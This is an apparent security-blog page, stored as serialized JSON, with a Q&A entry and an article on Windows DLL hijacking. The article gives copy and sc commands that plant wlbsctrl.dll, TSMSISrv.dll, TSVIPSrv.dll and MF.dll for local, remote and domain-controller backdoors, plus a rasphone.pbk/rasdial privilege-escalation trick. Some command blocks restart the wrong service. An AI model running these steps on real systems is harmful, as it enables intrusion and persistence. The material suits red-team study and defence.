[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fAu8QSLj0AV7NSlNLPPUT3OS4oauRtRb1LePZe1tL-7w":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},737,"What is the key difference between the original usage of wlbsctrl.dll in the primer and the privilege escalation technique described in this article?","The original [Expansion on the Exploitation of \"Lateral Movement — SCM and DLL Hijacking Primer\"](\u002Fnews\u002Fexpansion-on-the-exploitation-of-lateral-movement-scm-and-dll-hijacking-primer) used wlbsctrl.dll with administrator privileges to copy the DLL and manually start the IKEEXT service for remote code execution. The privilege escalation technique builds on this by exploiting the fact that the IKEEXT service loads wlbsctrl.dll without an absolute path, allowing standard users to hijack the DLL via a writable directory in the PATH environment variable, then trigger the service using `rasdial` with a crafted `rasphone.pbk` file.","\u003Cp>The original [Expansion on the Exploitation of &quot;Lateral Movement — SCM and DLL Hijacking Primer&quot;](\u002Fnews\u002Fexpansion-on-the-exploitation-of-lateral-movement-scm-and-dll-hijacking-primer) used wlbsctrl.dll with administrator privileges to copy the DLL and manually start the IKEEXT service for remote code execution. The privilege escalation technique builds on this by exploiting the fact that the IKEEXT service loads wlbsctrl.dll without an absolute path, allowing standard users to hijack the DLL via a writable directory in the PATH environment variable, then trigger the service using `rasdial` with a crafted `rasphone.pbk` file.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fexpansion-on-the-exploitation-of-lateral-movement-scm-and-dll-hijacking-primer\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-is-the-key-difference-between-the-original-usage-of-wlbsctrldll-in-the-prim-1777482093802","wlbsctrl.dll, DLL hijacking, privilege escalation, IKEEXT, PATH hijacking, rasdial",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},182,"Expansion on the Exploitation of \"Lateral Movement — SCM and DLL Hijacking Primer\"","expansion-on-the-exploitation-of-lateral-movement-scm-and-dll-hijacking-primer","Learn advanced exploitation of wlbsctrl.dll for privilege escalation and TSMSISrv.dll\u002FTSVIPSrv.dll for backdoor attacks via SCM in Windows systems.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\"Lateral Movement — SCM and DLL Hijacking Primer\" introduced three DLLs (wlbsctrl.dll, TSMSISrv.dll, and TSVIPSrv.dll) that can achieve remote execution via SCM (Service Control Manager). This article will expand on the usage of these three DLLs, separately introducing methods for privilege escalation and backdoor exploitation.\u003C\u002Fp>\u003Cp>Article link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fposts.specterops.io\u002Flateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Privilege escalation using wlbsctrl.dll\u003C\u002Fli>\u003Cli>Backdoor exploitation using TSMSISrv.dll and TSVIPSrv.dll\u003C\u002Fli>\u003Cli>Backdoor exploitation using MF.dll\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x03 Exploitation of wlbsctrl.dll\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Usage from the original article\u003C\u002Fh3>\u003Cp>The IKEEXT (IKE and AuthIP IPsec Keying Modules) service loads wlbsctrl.dll during startup, but this DLL does not exist in the default Windows configuration. If we place our own DLL at this location, it will be loaded when the service starts.\u003C\u002Fp>\u003Cp>POC:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fdjhohnstein\u002Fwlbsctrl_poc\u003C\u002Fp>\u003Cp>Test system: Win7 x64\u003C\u002Fp>\u003Cp>The DLL used here does not require specifying export functions, so we can directly use my previous test DLL:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Local execution method:\u003C\u002Fp>\u003Cp>(Administrator privileges required)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>copy calc_x64.dll C:\\Windows\\System32\\wlbsctrl.dll\u003Cbr>sc query IKEEXT\u003Cbr>sc stop IKEEXT\u003Cbr>sc start IKEEXT\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Remote execution method:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>copy calc_x64.dll \\\\TARGET\\C$\\Windows\\System32\\wlbsctrl.dll\u003Cbr>sc \\\\TARGET query IKEEXT\u003Cbr>sc \\\\TARGET stop IKEEXT\u003Cbr>sc \\\\TARGET start IKEEXT\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Privilege escalation implemented using wlbsctrl.dll\u003C\u002Fh3>\u003Cp>POC:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fitm4n\u002FIkeext-Privesc\u003C\u002Fp>\u003Cp>Implementation principle:\u003C\u002Fp>\u003Ch4>1. The IKEEXT (IKE and AuthIP IPsec Keying Modules) service loads wlbsctrl.dll upon startup, but does not specify an absolute path\u003C\u002Fh4>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>When a program calls a DLL without specifying its full path, the system follows a fixed search order to locate the DLL\u003C\u002Fp>\u003Cp>If SafeDllSearchMode is enabled, the program searches for the DLL file in the following order:\u003C\u002Fp>\u003Cul>\u003Cli>The directory from which the application loaded\u003C\u002Fli>\u003Cli>The system directory\u003C\u002Fli>\u003Cli>The 16-bit system directory\u003C\u002Fli>\u003Cli>The Windows directory\u003C\u002Fli>\u003Cli>The current directory\u003C\u002Fli>\u003Cli>The directories that are listed in the PATH environment variable\u003C\u002Fli>\u003C\u002Ful>\u003Cp>If disabled, search for DLL files from the following locations:\u003C\u002Fp>\u003Cul>\u003Cli>The directory from which the application loaded\u003C\u002Fli>\u003Cli>The current directory\u003C\u002Fli>\u003Cli>The system directory\u003C\u002Fli>\u003Cli>The 16-bit system directory\u003C\u002Fli>\u003Cli>The Windows directory\u003C\u002Fli>\u003Cli>The directories that are listed in the PATH environment variable\u003C\u002Fli>\u003C\u002Ful>\u003Cp>For detailed information, see:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fms682586(VS.85).aspx\u003C\u002Fp>\u003Ch4>2. Under the default configuration of the Windows system, wlbsctrl.dll does not exist. If we can find a PATH environment variable that meets the conditions (writable with standard user permissions), we can achieve DLL hijacking and load our own DLL.\u003C\u002Fh4>\u003Ch4>3. Standard user permissions can start the IKEEXT service as follows:\u003C\u002Fh4>\u003Cp>Generate the file rasphone.pbk:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[IKEEXT]\u003Cbr>MEDIA=rastapi\u003Cbr>Port=VPN2-0\u003Cbr>Device=Wan Miniport (IKEv2)\u003Cbr>DEVICE=vpn\u003Cbr>PhoneNumber=127.0.0.1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Command line execution:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>rasdial IKEEXT test test \u002FPHONEBOOK:rasphone.pbk\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This vulnerability is very old and was publicly disclosed as early as October 9, 2012\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.immuniweb.com\u002Fadvisory\u002FHTB23108\u003C\u002Fp>\u003Ch2>0x04 Exploitation of TSMSISrv.dll and TSVIPSrv.dll\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Usage in the original text\u003C\u002Fh3>\u003Cp>The SessionEnv (Remote Desktop Configuration) service loads C:\\Windows\\System32\\TSMSISrv.dll and C:\\Windows\\System32\\TSVIPSrv.dll upon startup, but these two DLLs do not exist under the default Windows system configuration. If we place our own DLL in this location, it will be loaded when the service starts\u003C\u002Fp>\u003Cp>POC:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fdjhohnstein\u002FTSMSISrv_poc\u003C\u002Fp>\u003Cp>Test system: Win7 x64\u003C\u002Fp>\u003Cp>POC added export functions StartComponent, StopComponent, OnSessionChange, and Refresh\u003C\u002Fp>\u003Cp>In my test environment, the DLL does not require specifying export functions, so my previously tested DLL can be used directly:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Usage for local execution:\u003C\u002Fp>\u003Cp>(Administrator privileges required)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>copy calc_x64.dll C:\\Windows\\System32\\TSMSISrv.dll\u003Cbr>sc query IKEEXT\u003Cbr>sc stop IKEEXT\u003Cbr>sc start IKEEXT\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Or\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>copy calc_x64.dll C:\\Windows\\System32\\TSVIPSrv.dll\u003Cbr>sc query IKEEXT\u003Cbr>sc stop IKEEXT\u003Cbr>sc start IKEEXT\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Usage of remote execution:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>copy calc_x64.dll \\\\TARGET\\C$\\Windows\\System32\\TSMSISrv.dll\u003Cbr>sc \\\\TARGET query IKEEXT\u003Cbr>sc \\\\TARGET stop IKEEXT\u003Cbr>sc \\\\TARGET start IKEEXT\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>or\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>copy calc_x64.dll \\\\TARGET\\C$\\Windows\\System32\\TSVIPSrv.dll\u003Cbr>sc \\\\TARGET query IKEEXT\u003Cbr>sc \\\\TARGET stop IKEEXT\u003Cbr>sc \\\\TARGET start IKEEXT\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Backdoor implemented using TSMSISrv.dll and TSVIPSrv.dll\u003C\u002Fh3>\u003Cp>If the system has Remote Desktop functionality enabled (supporting remote connections to this computer), the SessionEnv (Remote Desktop Configuration) service will be started\u003C\u002Fp>\u003Cp>If we write TSMSISrv.dll or TSVIPSrv.dll under C:\\Windows\\System32\\, the DLL will be loaded when the service starts, achieving code execution\u003C\u002Fp>\u003Cp>\u003Cstrong>Application scenario:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Obtain remote access permissions to domain controller files but cannot execute commands remotely\u003C\u002Fp>\u003Cp>\u003Cstrong>Solution:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>1. If the domain controller does not have Remote Desktop enabled, hijack the loading of fxsst.dll by Explorer.exe during system startup.\u003C\u002Fp>\u003Cp>Write the file C:\\Windows\\fxsst.dll\u003C\u002Fp>\u003Cp>2. If the domain controller has Remote Desktop enabled, the SessionEnv service will start during system startup, loading TSMSISrv.dll or TSVIPSrv.dll.\u003C\u002Fp>\u003Cp>Write the file C:\\Windows\\System32\\TSMSISrv.dll or C:\\Windows\\System32\\TSMSISrv.dll\u003C\u002Fp>\u003Cp>3. If the domain controller has Remote Desktop enabled, MF.dll will be loaded when a user initiates a Remote Desktop connection.\u003C\u002Fp>\u003Cp>\u003Cstrong>Actual Test:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Test Environment: Server 2012 R2 x64\u003C\u002Fp>\u003Cp>Write the file C:\\Windows\\System32\\MF.dll, command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>copy calc_x64.dll C:\\Windows\\System32\\MF.dll\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Wait for a user to connect via Remote Desktop. Upon successful connection, MF.dll is loaded, launching the calculator as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017240505_0_87b41f598b.jpeg\">\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces three exploitation methods: privilege escalation via wlbsctrl.dll, a backdoor via TSMSISrv.dll\u002FTSVIPSrv.dll, and a backdoor via MF.dll. Among these, MF.dll can be used to address the issue of gaining remote file access permissions on a domain controller but being unable to execute commands remotely.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\"Lateral Movement — SCM and DLL Hijacking Primer\" introduced three DLLs (wlbsctrl.dll, TSMSISrv.dll, and TSVIPSrv.dll) that can achieve remote execution via SCM (Service Control Manager). This article will expand on the usage of these three DLLs, separately introducing methods for privilege escalation and backdoor exploitation.\u003C\u002Fp>\u003Cp>Article link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fposts.specterops.io\u002Flateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Privilege escalation using wlbsctrl.dll\u003C\u002Fli>\u003Cli>Backdoor exploitation using TSMSISrv.dll and TSVIPSrv.dll\u003C\u002Fli>\u003Cli>Backdoor exploitation using MF.dll\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x03 Exploitation of wlbsctrl.dll\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Usage from the original article\u003C\u002Fh3>\u003Cp>The IKEEXT (IKE and AuthIP IPsec Keying Modules) service loads wlbsctrl.dll during startup, but this DLL does not exist in the default Windows configuration. If we place our own DLL at this location, it will be loaded when the service starts.\u003C\u002Fp>\u003Cp>POC:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fdjhohnstein\u002Fwlbsctrl_poc\u003C\u002Fp>\u003Cp>Test system: Win7 x64\u003C\u002Fp>\u003Cp>The DLL used here does not require specifying export functions, so we can directly use my previous test DLL:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Local execution method:\u003C\u002Fp>\u003Cp>(Administrator privileges required)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>copy calc_x64.dll C:\\Windows\\System32\\wlbsctrl.dll\u003Cbr>sc query IKEEXT\u003Cbr>sc stop IKEEXT\u003Cbr>sc start IKEEXT\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Remote execution method:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>copy calc_x64.dll \\\\TARGET\\C$\\Windows\\System32\\wlbsctrl.dll\u003Cbr>sc \\\\TARGET query IKEEXT\u003Cbr>sc \\\\TARGET stop IKEEXT\u003Cbr>sc \\\\TARGET start IKEEXT\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Privilege escalation implemented using wlbsctrl.dll\u003C\u002Fh3>\u003Cp>POC:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fitm4n\u002FIkeext-Privesc\u003C\u002Fp>\u003Cp>Implementation principle:\u003C\u002Fp>\u003Ch4>1. The IKEEXT (IKE and AuthIP IPsec Keying Modules) service loads wlbsctrl.dll upon startup, but does not specify an absolute path\u003C\u002Fh4>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>When a program calls a DLL without specifying its full path, the system follows a fixed search order to locate the DLL\u003C\u002Fp>\u003Cp>If SafeDllSearchMode is enabled, the program searches for the DLL file in the following order:\u003C\u002Fp>\u003Cul>\u003Cli>The directory from which the application loaded\u003C\u002Fli>\u003Cli>The system directory\u003C\u002Fli>\u003Cli>The 16-bit system directory\u003C\u002Fli>\u003Cli>The Windows directory\u003C\u002Fli>\u003Cli>The current directory\u003C\u002Fli>\u003Cli>The directories that are listed in the PATH environment variable\u003C\u002Fli>\u003C\u002Ful>\u003Cp>If disabled, search for DLL files from the following locations:\u003C\u002Fp>\u003Cul>\u003Cli>The directory from which the application loaded\u003C\u002Fli>\u003Cli>The current directory\u003C\u002Fli>\u003Cli>The system directory\u003C\u002Fli>\u003Cli>The 16-bit system directory\u003C\u002Fli>\u003Cli>The Windows directory\u003C\u002Fli>\u003Cli>The directories that are listed in the PATH environment variable\u003C\u002Fli>\u003C\u002Ful>\u003Cp>For detailed information, see:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fms682586(VS.85).aspx\u003C\u002Fp>\u003Ch4>2. Under the default configuration of the Windows system, wlbsctrl.dll does not exist. If we can find a PATH environment variable that meets the conditions (writable with standard user permissions), we can achieve DLL hijacking and load our own DLL.\u003C\u002Fh4>\u003Ch4>3. Standard user permissions can start the IKEEXT service as follows:\u003C\u002Fh4>\u003Cp>Generate the file rasphone.pbk:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[IKEEXT]\u003Cbr>MEDIA=rastapi\u003Cbr>Port=VPN2-0\u003Cbr>Device=Wan Miniport (IKEv2)\u003Cbr>DEVICE=vpn\u003Cbr>PhoneNumber=127.0.0.1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Command line execution:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>rasdial IKEEXT test test \u002FPHONEBOOK:rasphone.pbk\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This vulnerability is very old and was publicly disclosed as early as October 9, 2012\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.immuniweb.com\u002Fadvisory\u002FHTB23108\u003C\u002Fp>\u003Ch2>0x04 Exploitation of TSMSISrv.dll and TSVIPSrv.dll\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Usage in the original text\u003C\u002Fh3>\u003Cp>The SessionEnv (Remote Desktop Configuration) service loads C:\\Windows\\System32\\TSMSISrv.dll and C:\\Windows\\System32\\TSVIPSrv.dll upon startup, but these two DLLs do not exist under the default Windows system configuration. If we place our own DLL in this location, it will be loaded when the service starts\u003C\u002Fp>\u003Cp>POC:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fdjhohnstein\u002FTSMSISrv_poc\u003C\u002Fp>\u003Cp>Test system: Win7 x64\u003C\u002Fp>\u003Cp>POC added export functions StartComponent, StopComponent, OnSessionChange, and Refresh\u003C\u002Fp>\u003Cp>In my test environment, the DLL does not require specifying export functions, so my previously tested DLL can be used directly:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Usage for local execution:\u003C\u002Fp>\u003Cp>(Administrator privileges required)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>copy calc_x64.dll C:\\Windows\\System32\\TSMSISrv.dll\u003Cbr>sc query IKEEXT\u003Cbr>sc stop IKEEXT\u003Cbr>sc start IKEEXT\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Or\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>copy calc_x64.dll C:\\Windows\\System32\\TSVIPSrv.dll\u003Cbr>sc query IKEEXT\u003Cbr>sc stop IKEEXT\u003Cbr>sc start IKEEXT\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Usage of remote execution:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>copy calc_x64.dll \\\\TARGET\\C$\\Windows\\System32\\TSMSISrv.dll\u003Cbr>sc \\\\TARGET query IKEEXT\u003Cbr>sc \\\\TARGET stop IKEEXT\u003Cbr>sc \\\\TARGET start IKEEXT\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>or\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>copy calc_x64.dll \\\\TARGET\\C$\\Windows\\System32\\TSVIPSrv.dll\u003Cbr>sc \\\\TARGET query IKEEXT\u003Cbr>sc \\\\TARGET stop IKEEXT\u003Cbr>sc \\\\TARGET start IKEEXT\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Backdoor implemented using TSMSISrv.dll and TSVIPSrv.dll\u003C\u002Fh3>\u003Cp>If the system has Remote Desktop functionality enabled (supporting remote connections to this computer), the SessionEnv (Remote Desktop Configuration) service will be started\u003C\u002Fp>\u003Cp>If we write TSMSISrv.dll or TSVIPSrv.dll under C:\\Windows\\System32\\, the DLL will be loaded when the service starts, achieving code execution\u003C\u002Fp>\u003Cp>\u003Cstrong>Application scenario:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Obtain remote access permissions to domain controller files but cannot execute commands remotely\u003C\u002Fp>\u003Cp>\u003Cstrong>Solution:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>1. If the domain controller does not have Remote Desktop enabled, hijack the loading of fxsst.dll by Explorer.exe during system startup.\u003C\u002Fp>\u003Cp>Write the file C:\\Windows\\fxsst.dll\u003C\u002Fp>\u003Cp>2. If the domain controller has Remote Desktop enabled, the SessionEnv service will start during system startup, loading TSMSISrv.dll or TSVIPSrv.dll.\u003C\u002Fp>\u003Cp>Write the file C:\\Windows\\System32\\TSMSISrv.dll or C:\\Windows\\System32\\TSMSISrv.dll\u003C\u002Fp>\u003Cp>3. If the domain controller has Remote Desktop enabled, MF.dll will be loaded when a user initiates a Remote Desktop connection.\u003C\u002Fp>\u003Cp>\u003Cstrong>Actual Test:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Test Environment: Server 2012 R2 x64\u003C\u002Fp>\u003Cp>Write the file C:\\Windows\\System32\\MF.dll, command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>copy calc_x64.dll C:\\Windows\\System32\\MF.dll\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Wait for a user to connect via Remote Desktop. Upon successful connection, MF.dll is loaded, launching the calculator as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017240505_0_87b41f598b-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces three exploitation methods: privilege escalation via wlbsctrl.dll, a backdoor via TSMSISrv.dll\u002FTSVIPSrv.dll, and a backdoor via MF.dll. Among these, MF.dll can be used to address the issue of gaining remote file access permissions on a domain controller but being unable to execute commands remotely.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",767,"Onedaysec",4,"published","2026-02-02T07:38:21.201Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Exploit DLL Hijacking for Privilege Escalation & Backdoors","DLL hijacking, privilege escalation, SCM exploitation, wlbsctrl.dll, TSMSISrv.dll, TSVIPSrv.dll, lateral movement, Windows security, backdoor techniques",null,false,[],{"docs":43,"hasNextPage":40},[44,45,46,4],740,739,738,{"title":39,"description":39,"image":39},"2026-07-24T15:37:11.680Z","2026-07-23T16:02:01.389Z","draft","2026-07-23T16:14:27.663Z"]